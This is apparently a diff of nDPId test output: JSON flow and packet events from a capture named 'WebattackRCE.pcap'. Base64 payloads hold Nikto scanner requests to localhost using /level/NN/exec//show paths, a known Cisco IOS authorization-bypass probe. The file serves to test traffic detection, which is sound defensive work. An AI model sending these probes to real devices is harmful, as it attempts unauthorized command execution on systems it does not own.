+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/49\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001296)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1576420277639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277639,"pkt":"AAAAAAAAAAAAAAAACABFAADIZI9AAEAG155\/AAABfwAAAcZGH5DAl12NotXkTIAYAED+vAAAAQEICp1m\/q+dZv6vR0VUIC9sZXZlbC81MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/50\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001297)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/50\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001297)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1576420277642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277642,"pkt":"AAAAAAAAAAAAAAAACABFAADIuMhAAEAGg2V\/AAABfwAAAcZIH5DuPYHFtiFXooAYAED+vAAAAQEICp1m\/rKdZv6yR0VUIC9sZXZlbC81MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/51\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001298)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/51\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001298)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1576420277644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277644,"pkt":"AAAAAAAAAAAAAAAACABFAADIp2FAAEAGlMx\/AAABfwAAAcZKH5BZVp5d6Tz88YAYAED+vAAAAQEICp1m\/rSdZv60R0VUIC9sZXZlbC81Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/52\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001299)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/52\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001299)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1576420277646,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277646,"pkt":"AAAAAAAAAAAAAAAACABFAADIRMlAAEAG92R\/AAABfwAAAcZMH5Ck2n3FkPG1\/IAYAED+vAAAAQEICp1m\/radZv62R0VUIC9sZXZlbC81My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/53\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001300)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/53\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001300)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1576420277648,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277648,"pkt":"AAAAAAAAAAAAAAAACABFAADIfG5AAEAGv79\/AAABfwAAAcZOH5Bk90VplsnARIAYAED+vAAAAQEICp1m\/ridZv64R0VUIC9sZXZlbC81NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/54\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001301)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/54\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001301)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1576420277650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277650,"pkt":"AAAAAAAAAAAAAAAACABFAADIGk5AAEAGIeB\/AAABfwAAAcZQH5A3JSNJK84\/noAYAED+vAAAAQEICp1m\/rmdZv65R0VUIC9sZXZlbC81NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/55\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001302)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/55\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001302)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1576420277657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277657,"pkt":"AAAAAAAAAAAAAAAACABFAADIqGlAAEAGk8R\/AAABfwAAAcZSH5BRNZFiv2NJXIAYAED+vAAAAQEICp1m\/sGdZv7AR0VUIC9sZXZlbC81Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/56\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001303)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/56\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001303)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1576420277658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277658,"pkt":"AAAAAAAAAAAAAAAACABFAADIKidAAEAGEgd\/AAABfwAAAcZUH5DRhBMk1ziDVIAYAED+vAAAAQEICp1m\/sKdZv7CR0VUIC9sZXZlbC81Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDQpDQoNCg=="} 